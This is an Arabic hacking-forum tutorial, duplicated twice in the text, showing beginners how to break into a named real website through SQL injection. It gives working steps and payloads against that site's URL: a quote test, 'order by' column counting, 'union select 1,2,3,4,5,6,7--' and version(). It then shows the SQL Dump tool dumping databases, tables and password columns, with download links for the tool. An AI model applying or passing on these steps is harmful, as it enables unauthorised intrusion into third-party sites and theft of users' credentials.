شرح أداة SQL Dump لاختراق المواقع بغرة SQL
مرحبا
كيفكم شباب؟
اليوم زهقان وماني عارف شو اعمل..قلت خلني انزل لكم للمبتدئين درس يستفيدوا منه عن اداة SQL Dump وثغرة سكيول الاصدار الخامس.
الشرح مني وانا كتبته وليش منقولا .. وتكفي كلمة شكر :a09:
اولا نبدا.. معانا موقع مصاب..واللي هو:
بعدين بنتفقد الموقع اذا مصاب بـ SQL
بوضع " آخر الرابط
تمام طلعلنا خطا سكيول ..
حلو جدا.. بنطلع عدد الجداول عن طريق الامر
[PHP]order by [/PHP]
حلو نخمن
حطينا رقم 15 وطلع الخطا
طيب انجرب رقم اقل
جربت 10 وجربت 9 وجربت 8 والطا بيظهر..
وصلت لرقم 7 والخطا اختفى
تمام التمام
عدد الجداول 7 مممتاز..
هسة بنروح على امر
ونشوف الاعمدة المصابة
ملاحظة:
الامر مع عدد الجداول بيصير على الشكل هاد
بنضيف - اول الرابط قبل المتغير و -- آخر الرابط بعد آخر رقم للجدول
بيصير الرابط هيك:
شوفوا الصورة
تمام:41:
طلعوا الجداول المصابة وهي
4,5,6,7
شوفوا اجو جنب بعض بالصورة فوق
تمام... انشوف هلأ رقم اصدار القاعدة .. الشرح على الاصدار الخامس فقط والاداة ما بتشتغل على الرابع.
نحط مكان اي عمود مصاب كلمة
بيطلع زي بالصورة:
حلو الاصدار 5 ..
اذا بنروح الاداة .. وبنحط فيها الرابط المصاب بدون - باول الرابط ولا -- آخر الرابط..ومكان العمود المصاب بنحط كلمة
ملاحظة:
انتبهوا كلمة target لازم تيجي بين قوس مثل هيك []
زي بالصورة:
طيب نضغط مع بعض على كلمة Get Databases List
بيصير يحمل ويستخرج القواعد الخاصة والموجودة بالموقع..
كما بالصورة:
تمام
طيب هسة بدنا نستخرج الجداول الموجودة بالقاعدة.. بنضغط على اسم القاعدة من اليسار وبنكبس على Get Tables
وبيصير يستخرج لنا الجداول كما بالصورة:
تمام التمام..
معظم المواقع بس تجيب اسماء الجداول بتلاقي جدول للباس او اليوزرات او الاعضاء او المدير
بتضغط على اسم الجدول وبتضغط على Get Columns عشان نجيب الاعمدة بالجداول وطبعا منها بنجيب الباس..
شوفوا الصورة:
حلو حلو:41:
هلا بنضغط على اسم العمود ومثلا لو كان pass لو password بتضغط على اسمه وبتضغط من تحت على Dump selected Data ..
بيطلعلك مثل ما هو بالصورة التالية وهو محتويات العمود ومنها الباسورد بتكون حسب العمود..
تمااااام التمام
طلعنا البيانات بسهولة باداة SQL Dump بثغرات سكيول الاصدار الخامس
الآن تحميل الأداة
http://www.mediafire.com/?d61rmvmnfzzejnv
أو ملتي أبلود:
http://www.multiupload.com/SPQVIGAWHW
ملاحظة هامة جدا
ممن لم يعمل معه البرنامج وخصوصا على ويندوز XP ويظهر له خطا
The application failed to iintialize (0xz0000135) . Click Ok To Terminate The application
تحميل البرنامج الآتي:
http://www.multiupload.com/V4AMDPD7C2
وينصبه قبل ما يشغل الأداة
تحياتي للجميع
كيفكم شباب؟
اليوم زهقان وماني عارف شو اعمل..قلت خلني انزل لكم للمبتدئين درس يستفيدوا منه عن اداة SQL Dump وثغرة سكيول الاصدار الخامس.
الشرح مني وانا كتبته وليش منقولا .. وتكفي كلمة شكر :a09:
اولا نبدا.. معانا موقع مصاب..واللي هو:
PHP:
http://lafla.org/newsletter.php?id=11بعدين بنتفقد الموقع اذا مصاب بـ SQL
بوضع " آخر الرابط
تمام طلعلنا خطا سكيول ..
حلو جدا.. بنطلع عدد الجداول عن طريق الامر
[PHP]order by [/PHP]
حلو نخمن
حطينا رقم 15 وطلع الخطا
طيب انجرب رقم اقل
جربت 10 وجربت 9 وجربت 8 والطا بيظهر..
وصلت لرقم 7 والخطا اختفى
تمام التمام
عدد الجداول 7 مممتاز..
هسة بنروح على امر
PHP:
union selectونشوف الاعمدة المصابة
ملاحظة:
الامر مع عدد الجداول بيصير على الشكل هاد
بنضيف - اول الرابط قبل المتغير و -- آخر الرابط بعد آخر رقم للجدول
بيصير الرابط هيك:
PHP:
http://lafla.org/newsletter.php?id=-11 union select 1,2,3,4,5,6,7--شوفوا الصورة
تمام:41:
طلعوا الجداول المصابة وهي
4,5,6,7
شوفوا اجو جنب بعض بالصورة فوق
تمام... انشوف هلأ رقم اصدار القاعدة .. الشرح على الاصدار الخامس فقط والاداة ما بتشتغل على الرابع.
نحط مكان اي عمود مصاب كلمة
PHP:
version()بيطلع زي بالصورة:
حلو الاصدار 5 ..
اذا بنروح الاداة .. وبنحط فيها الرابط المصاب بدون - باول الرابط ولا -- آخر الرابط..ومكان العمود المصاب بنحط كلمة
PHP:
[target]ملاحظة:
انتبهوا كلمة target لازم تيجي بين قوس مثل هيك []
زي بالصورة:
طيب نضغط مع بعض على كلمة Get Databases List
بيصير يحمل ويستخرج القواعد الخاصة والموجودة بالموقع..
كما بالصورة:
تمام
طيب هسة بدنا نستخرج الجداول الموجودة بالقاعدة.. بنضغط على اسم القاعدة من اليسار وبنكبس على Get Tables
وبيصير يستخرج لنا الجداول كما بالصورة:
تمام التمام..
معظم المواقع بس تجيب اسماء الجداول بتلاقي جدول للباس او اليوزرات او الاعضاء او المدير
بتضغط على اسم الجدول وبتضغط على Get Columns عشان نجيب الاعمدة بالجداول وطبعا منها بنجيب الباس..
شوفوا الصورة:
حلو حلو:41:
هلا بنضغط على اسم العمود ومثلا لو كان pass لو password بتضغط على اسمه وبتضغط من تحت على Dump selected Data ..
بيطلعلك مثل ما هو بالصورة التالية وهو محتويات العمود ومنها الباسورد بتكون حسب العمود..
تمااااام التمام
طلعنا البيانات بسهولة باداة SQL Dump بثغرات سكيول الاصدار الخامس
الآن تحميل الأداة
http://www.mediafire.com/?d61rmvmnfzzejnv
أو ملتي أبلود:
http://www.multiupload.com/SPQVIGAWHW
ملاحظة هامة جدا
ممن لم يعمل معه البرنامج وخصوصا على ويندوز XP ويظهر له خطا
The application failed to iintialize (0xz0000135) . Click Ok To Terminate The application
تحميل البرنامج الآتي:
http://www.multiupload.com/V4AMDPD7C2
وينصبه قبل ما يشغل الأداة
تحياتي للجميع
اسم الموضوع : شرح أداة SQL Dump لاختراق المواقع بغرة SQL
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات